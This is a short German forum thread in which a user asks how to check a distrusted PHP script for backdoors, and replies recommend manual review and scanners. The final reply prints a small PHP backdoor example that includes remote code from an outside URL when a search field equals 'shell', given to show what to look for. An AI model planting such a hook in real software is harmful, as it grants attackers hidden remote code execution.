Skript auf Sicherheitslücken überprüfen

[sn0w]

Wenn du keinen Zugriff auf den Webspace hast, haste sowieso keine Chance, ansonsten haste ja die Vorschläge schon...

MfG

[Iaa_1]

Ich habe den kompletten Zugriff auf den Webspace wo ich das Skript raufpacken will (Cpanel) und ich habe das Skript an sich als *.rar (kann ich jederzeit entpacken, so dass ich php Dateien usw. erhalte)

[sn0w]

Und wo genau liegt jetzt dein Problem?

MfG

[Iaa_1]

Und wo genau liegt jetzt dein Problem?

MfG

Das ich der Person nicht traue, die das Skript gemacht hat, und ich wissen will, ob dieses irgendeine Hintertür für ihn enthält.

[sn0w]

Dann haste jetzt 3 Möglichkeiten:
- Öffne es mit dem Editor und schau es durch.
- Nimm das Programm was lolcat vorgeschlagen hat
- Lass es bleiben!

MfG

[Atropos]

Dafür gibt es einTool.
Acunix Web Vuln Scanner.
Aber selbst ist der Mann

[br00_pwn]

Leute, wenn das Script von jemanden geschrieben wurde, der wirklich was drauf hat
(wovon ich mal ausgehe) würde ich mich auf keins dieser Tools verlassen
Wenn ihr eine Exe runter ladet und euer AV nicht anspringt, heißt das auch lange noch nicht, dass die Datei clean ist.
Sicherlich kannst du mit solchen Tools anfangen, um offensichtliche Lücken aufzudecken, aber um wirklich sicher zu sein, hilf nur dein Auge & Kopf

LG br00_pwn

[0x30]

Stell es Online und hoffe das es nette Leute gibt die es sich mal anschauen

[novaca!ne]

try this:
http://eddy14.jmp-esp.net/docs/php-vulnz.txt

[zenjox]

Das bringt ihm alles rein garnichts
Wenn ich eine hintertür einbauen würden, würde ich ganz einfach z.B. in der Suche einbauen:
Wenn die eingabe = shell ist, include("shell.php");

PHP-Code:

if($_POST['suche'] == "shell"){
include("http://seite.de/datei.php");
} 


Du musst den ganzen Quelltext durchgucken, damit du dir 100% sicher sein kannst.